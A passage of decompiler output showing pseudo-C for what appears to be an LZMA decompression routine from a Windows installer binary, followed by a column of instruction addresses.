												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L100:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t335 = __ebp - 0x70;
											 *_t335 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t335;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L102;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
												} else {
													goto L46;
												}
											}
											L54:
											_t173 = __ebp - 0x34;
											 *_t173 =  *(__ebp - 0x34) & 0x00000000;
											__eflags =  *_t173;
											goto L55;
										case 0xf:
											L58:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xf;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t203 = __ebp - 0x70;
											 *_t203 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t203;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L60:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												L55:
												__al =  *(__ebp - 0x44);
												 *(__ebp - 0x5c) =  *(__ebp - 0x44);
												goto L56;
											}
											L61:
											__eax =  *(__ebp - 0x58);
											__edx = __ebx + __ebx;
											__ecx =  *(__ebp - 0x10);
											__esi = __edx + __eax;
											__ecx =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edi = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												_t217 = __edx + 1; // 0x1
												__ebx = _t217;
												__cx = __ax >> 5;
												__eflags = __eax;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edi;
												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L60;
											} else {
												goto L58;
											}
										case 0x10:
											L110:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x10;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t366 = __ebp - 0x70;
											 *_t366 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t366;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											goto L112;
										case 0x11:
											L69:
											__esi =  *(__ebp - 0x58);
											 *(__ebp - 0x84) = 0x12;
											L132:
											 *(_t612 - 0x54) = _t605;
											goto L133;
										case 0x12:
											goto L0;
										case 0x13:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												_t469 = __ebp - 0x58;
												 *_t469 =  *(__ebp - 0x58) + 0x204;
												__eflags =  *_t469;
												 *(__ebp - 0x30) = 0x10;
												 *(__ebp - 0x40) = 8;
												goto L144;
											}
											__eax =  *(__ebp - 0x4c);
											__ecx =  *(__ebp - 0x58);
											__eax =  *(__ebp - 0x4c) << 4;
											 *(__ebp - 0x30) = 8;
											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
											goto L130;
										case 0x14:
											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
											__eax =  *(__ebp - 0x80);
											L140:
											 *(_t612 - 0x88) = _t533;
											goto L1;
										case 0x15:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
											__al = __al & 0x000000fd;
											__eax = (__eflags >= 0) - 1 + 0xb;
											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
											goto L121;
										case 0x16:
											__eax =  *(__ebp - 0x30);
											__eflags = __eax - 4;
											if(__eax >= 4) {
												_push(3);
												_pop(__eax);
											}
											__ecx =  *(__ebp - 4);
											 *(__ebp - 0x40) = 6;
											__eax = __eax << 7;
											 *(__ebp - 0x7c) = 0x19;
											 *(__ebp - 0x58) = __eax;
											goto L145;
										case 0x17:
											goto L145;
										case 0x18:
											L146:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0x18;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t484 = __ebp - 0x70;
											 *_t484 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t484;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L148:
											_t487 = __ebp - 0x48;
											 *_t487 =  *(__ebp - 0x48) - 1;
											__eflags =  *_t487;
											goto L149;
										case 0x19:
											__eflags = __ebx - 4;
											if(__ebx < 4) {
												 *(__ebp - 0x2c) = __ebx;
												L120:
												_t394 = __ebp - 0x2c;
												 *_t394 =  *(__ebp - 0x2c) + 1;
												__eflags =  *_t394;
												L121:
												__eax =  *(__ebp - 0x2c);
												__eflags = __eax;
												if(__eax == 0) {
													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
													goto L170;
												}
												__eflags = __eax -  *(__ebp - 0x60);
												if(__eax >  *(__ebp - 0x60)) {
													goto L171;
												}
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
												__eax =  *(__ebp - 0x30);
												_t401 = __ebp - 0x60;
												 *_t401 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
												__eflags =  *_t401;
												goto L124;
											}
											__ecx = __ebx;
											__eax = __ebx;
											__ecx = __ebx >> 1;
											__eax = __ebx & 0x00000001;
											__ecx = (__ebx >> 1) - 1;
											__al = __al | 0x00000002;
											__eax = (__ebx & 0x00000001) << __cl;
											__eflags = __ebx - 0xe;
											 *(__ebp - 0x2c) = __eax;
											if(__ebx >= 0xe) {
												__ebx = 0;
												 *(__ebp - 0x48) = __ecx;
												L103:
												__eflags =  *(__ebp - 0x48);
												if( *(__ebp - 0x48) <= 0) {
													__eax = __eax + __ebx;
													 *(__ebp - 0x40) = 4;
													 *(__ebp - 0x2c) = __eax;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x644;
													__eflags = __eax;
													L109:
													__ebx = 0;
													 *(__ebp - 0x58) = __eax;
													 *(__ebp - 0x50) = 1;
													 *(__ebp - 0x44) = 0;
													 *(__ebp - 0x48) = 0;
													L113:
													__eax =  *(__ebp - 0x40);
													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
														_t392 = __ebp - 0x2c;
														 *_t392 =  *(__ebp - 0x2c) + __ebx;
														__eflags =  *_t392;
														goto L120;
													}
													__eax =  *(__ebp - 0x50);
													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
													__eax =  *(__ebp - 0x58);
													__esi = __edi + __eax;
													 *(__ebp - 0x54) = __esi;
													__ax =  *__esi;
													__ecx = __ax & 0x0000ffff;
													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
													__eflags =  *(__ebp - 0xc) - __edx;
													if( *(__ebp - 0xc) >= __edx) {
														__ecx = 0;
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
														__ecx = 1;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
														__ebx = 1;
														__ecx =  *(__ebp - 0x48);
														__ebx = 1 << __cl;
														__ecx = 1 << __cl;
														__ebx =  *(__ebp - 0x44);
														__ebx =  *(__ebp - 0x44) | __ecx;
														__cx = __ax;
														__cx = __ax >> 5;
														__eax = __eax - __ecx;
														__edi = __edi + 1;
														__eflags = __edi;
														 *(__ebp - 0x44) = __ebx;
														 *__esi = __ax;
														 *(__ebp - 0x50) = __edi;
													} else {
														 *(__ebp - 0x10) = __edx;
														0x800 = 0x800 - __ecx;
														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
														 *__esi = __dx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													if( *(__ebp - 0x10) >= 0x1000000) {
														L112:
														_t369 = __ebp - 0x48;
														 *_t369 =  *(__ebp - 0x48) + 1;
														__eflags =  *_t369;
														goto L113;
													} else {
														goto L110;
													}
												}
												__ecx =  *(__ebp - 0xc);
												__ebx = __ebx + __ebx;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
													__ecx =  *(__ebp - 0x10);
													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
													__ebx = __ebx | 0x00000001;
													__eflags = __ebx;
													 *(__ebp - 0x44) = __ebx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												if( *(__ebp - 0x10) >= 0x1000000) {
													L102:
													_t339 = __ebp - 0x48;
													 *_t339 =  *(__ebp - 0x48) - 1;
													__eflags =  *_t339;
													goto L103;
												} else {
													goto L100;
												}
											}
											__edx =  *(__ebp - 4);
											__eax = __eax - __ebx;
											 *(__ebp - 0x40) = __ecx;
											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
											goto L109;
										case 0x1a:
											L56:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1a;
												goto L170;
											}
											__ecx =  *(__ebp - 0x68);
											__al =  *(__ebp - 0x5c);
											__edx =  *(__ebp - 8);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
											 *( *(__ebp - 0x68)) = __al;
											__ecx =  *(__ebp - 0x14);
											 *(__ecx +  *(__ebp - 8)) = __al;
											__eax = __ecx + 1;
											__edx = 0;
											_t192 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t192;
											goto L80;
										case 0x1b:
											L76:
											__eflags =  *(__ebp - 0x64);
											if( *(__ebp - 0x64) == 0) {
												 *(__ebp - 0x88) = 0x1b;
												goto L170;
											}
											__eax =  *(__ebp - 0x14);
											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
											__eflags = __eax -  *(__ebp - 0x74);
											if(__eax >=  *(__ebp - 0x74)) {
												__eax = __eax +  *(__ebp - 0x74);
												__eflags = __eax;
											}
											__edx =  *(__ebp - 8);
											__cl =  *(__eax + __edx);
											__eax =  *(__ebp - 0x14);
											 *(__ebp - 0x5c) = __cl;
											 *(__eax + __edx) = __cl;
											__eax = __eax + 1;
											__edx = 0;
											_t275 = __eax %  *(__ebp - 0x74);
											__eax = __eax /  *(__ebp - 0x74);
											__edx = _t275;
											__eax =  *(__ebp - 0x68);
											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
											_t284 = __ebp - 0x64;
											 *_t284 =  *(__ebp - 0x64) - 1;
											__eflags =  *_t284;
											 *( *(__ebp - 0x68)) = __cl;
											L80:
											 *(__ebp - 0x14) = __edx;
											goto L81;
										case 0x1c:
											while(1) {
												L124:
												__eflags =  *(__ebp - 0x64);
												if( *(__ebp - 0x64) == 0) {
													break;
												}
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__edx =  *(__ebp - 8);
												__cl =  *(__eax + __edx);
												__eax =  *(__ebp - 0x14);
												 *(__ebp - 0x5c) = __cl;
												 *(__eax + __edx) = __cl;
												__eax = __eax + 1;
												__edx = 0;
												_t415 = __eax %  *(__ebp - 0x74);
												__eax = __eax /  *(__ebp - 0x74);
												__edx = _t415;
												__eax =  *(__ebp - 0x68);
												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
												__eflags =  *(__ebp - 0x30);
												 *( *(__ebp - 0x68)) = __cl;
												 *(__ebp - 0x14) = _t415;
												if( *(__ebp - 0x30) > 0) {
													continue;
												} else {
													L81:
													 *(__ebp - 0x88) = 2;
													goto L1;
												}
											}
											 *(__ebp - 0x88) = 0x1c;
											L170:
											_push(0x22);
											_pop(_t567);
											memcpy( *(_t612 - 0x90), _t612 - 0x88, _t567 << 2);
											_t535 = 0;
											L172:
											return _t535;
									}
								}
								L171:
								_t535 = _t534 | 0xffffffff;
								goto L172;
							}
						}
						__eax =  *(__ebp - 0x50);
						 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
						__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
						__eax =  *(__ebp - 0x58);
						__esi = __edx + __eax;
						 *(__ebp - 0x54) = __esi;
						__ax =  *__esi;
						__edi = __ax & 0x0000ffff;
						__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
						if( *(__ebp - 0xc) >= __ecx) {
							 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
							__cx = __ax;
							__cx = __ax >> 5;
							__eax = __eax - __ecx;
							__edx = __edx + 1;
							 *__esi = __ax;
							 *(__ebp - 0x50) = __edx;
						} else {
							 *(__ebp - 0x10) = __ecx;
							0x800 = 0x800 - __edi;
							0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
							 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
							 *__esi = __cx;
						}
						if( *(__ebp - 0x10) >= 0x1000000) {
							goto L148;
						} else {
							goto L146;
						}
					}
					goto L1;
				}
			}








                      0x00000000
                      0x00406682
                      0x00406682
                      0x00406686
                      0x004066ab
                      0x004066b5
                      0x00000000
                      0x00406688
                      0x00406688
                      0x0040668b
                      0x0040668f
                      0x00406692
                      0x00406695
                      0x00406699
                      0x00406699
                      0x0040669c
                      0x00406776
                      0x00406776
                      0x0040677d
                      0x0040677d
                      0x00406780
                      0x00406787
                      0x004067b4
                      0x004067b8
                      0x00406818
                      0x0040681b
                      0x00406820
                      0x00406821
                      0x00406823
                      0x00406825
                      0x00406828
                      0x00406734
                      0x00406734
                      0x00406734
                      0x00405ed0
                      0x00405ed0
                      0x00405ed0
                      0x00405ed9
                      0x00000000
                      0x00000000
                      0x00405edf
                      0x00000000
                      0x00405eea
                      0x00000000
                      0x00000000
                      0x00405ef3
                      0x00405ef6
                      0x00405ef9
                      0x00405efd
                      0x00000000
                      0x00000000
                      0x00405f03
                      0x00405f06
                      0x00405f08
                      0x00405f09
                      0x00405f0c
                      0x00405f0e
                      0x00405f0f
                      0x00405f11
                      0x00405f14
                      0x00405f19
                      0x00405f1e
                      0x00405f27
                      0x00405f3a
                      0x00405f3d
                      0x00405f49
                      0x00405f71
                      0x00405f73
                      0x00405f81
                      0x00405f81
                      0x00405f85
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00405f75
                      0x00405f75
                      0x00405f78
                      0x00405f79
                      0x00405f79
                      0x00000000
                      0x00405f75
                      0x00405f4f
                      0x00405f54
                      0x00405f54
                      0x00405f5d
                      0x00405f65
                      0x00405f68
                      0x00000000
                      0x00405f6e
                      0x00405f6e
                      0x00000000
                      0x00405f6e
                      0x00000000
                      0x00405f8b
                      0x00405f8b
                      0x00405f8f
                      0x0040683b
                      0x00000000
                      0x0040683b
                      0x00405f98
                      0x00405fa8
                      0x00405fab
                      0x00405fae
                      0x00405fae
                      0x00405fae
                      0x00405fb1
                      0x00405fb5
                      0x00000000
                      0x00000000
                      0x00405fb7
                      0x00405fbd
                      0x00405fe7
                      0x00405fed
                      0x00405ff4
                      0x00000000
                      0x00405ff4
                      0x00405fc3
                      0x00405fc6
                      0x00405fcb
                      0x00405fcb
                      0x00405fd6
                      0x00405fde
                      0x00405fe1
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406026
                      0x0040602c
                      0x0040602f
                      0x0040603c
                      0x00406044
                      0x00000000
                      0x00000000
                      0x00405ffb
                      0x00405ffb
                      0x00405fff
                      0x0040684a
                      0x00000000
                      0x0040684a
                      0x0040600b
                      0x00406016
                      0x00406016
                      0x00406016
                      0x00406019
                      0x0040601c
                      0x0040601f
                      0x00406024
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x004066bb
                      0x004066bb
                      0x004066c1
                      0x004066c7
                      0x004066cd
                      0x004066e7
                      0x004066ea
                      0x004066f0
                      0x004066fb
                      0x004066fb
                      0x004066fd
                      0x004066cf
                      0x004066cf
                      0x004066de
                      0x004066e2
                      0x004066e2
                      0x00406707
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00000000
                      0x00406709
                      0x0040670d
                      0x004068bc
                      0x00000000
                      0x004068bc
                      0x00406719
                      0x00406720
                      0x00406728
                      0x0040672b
                      0x0040672e
                      0x0040672e
                      0x00000000
                      0x00000000
                      0x0040604c
                      0x0040604e
                      0x00406051
                      0x004060c2
                      0x004060c5
                      0x004060c8
                      0x004060cf
                      0x004060d9
                      0x00000000
                      0x004060d9
                      0x00406053
                      0x00406057
                      0x0040605a
                      0x0040605c
                      0x0040605f
                      0x00406062
                      0x00406064
                      0x00406067
                      0x00406069
                      0x0040606e
                      0x00406071
                      0x00406074
                      0x00406078
                      0x0040607f
                      0x00406082
                      0x00406089
                      0x0040608d
                      0x00406095
                      0x00406095
                      0x00406095
                      0x0040608f
                      0x0040608f
                      0x0040608f
                      0x00406084
                      0x00406084
                      0x00406084
                      0x00406099
                      0x0040609c
                      0x004060ba
                      0x004060bc
                      0x00000000
                      0x0040609e
                      0x0040609e
                      0x004060a1
                      0x004060a4
                      0x004060a7
                      0x004060a9
                      0x004060a9
                      0x004060a9
                      0x004060ac
                      0x004060af
                      0x004060b1
                      0x004060b2
                      0x004060b5
                      0x00000000
                      0x004060b5
                      0x00000000
                      0x004062eb
                      0x004062ef
                      0x0040630d
                      0x00406310
                      0x00406317
                      0x0040631a
                      0x0040631d
                      0x00406320
                      0x00406323
                      0x00406326
                      0x00406328
                      0x0040632f
                      0x00406330
                      0x00406332
                      0x00406335
                      0x00406338
                      0x0040633b
                      0x0040633b
                      0x00406340
                      0x00000000
                      0x00406340
                      0x004062f1
                      0x004062f4
                      0x004062f7
                      0x00406301
                      0x00000000
                      0x00000000
                      0x00406355
                      0x00406359
                      0x0040637c
                      0x0040637f
                      0x00406382
                      0x0040638c
                      0x0040635b
                      0x0040635b
                      0x0040635e
                      0x00406361
                      0x00406364
                      0x00406371
                      0x00406374
                      0x00406374
                      0x00000000
                      0x00000000
                      0x00406398
                      0x0040639c
                      0x00000000
                      0x00000000
                      0x004063a2
                      0x004063a6
                      0x00000000
                      0x00000000
                      0x004063ac
                      0x004063ae
                      0x004063b2
                      0x004063b2
                      0x004063b5
                      0x004063b9
                      0x00000000
                      0x00000000
                      0x00406409
                      0x0040640d
                      0x00406414
                      0x00406417
                      0x0040641a
                      0x00406424
                      0x00000000
                      0x00406424
                      0x0040640f
                      0x00000000
                      0x00000000
                      0x00406430
                      0x00406434
                      0x0040643b
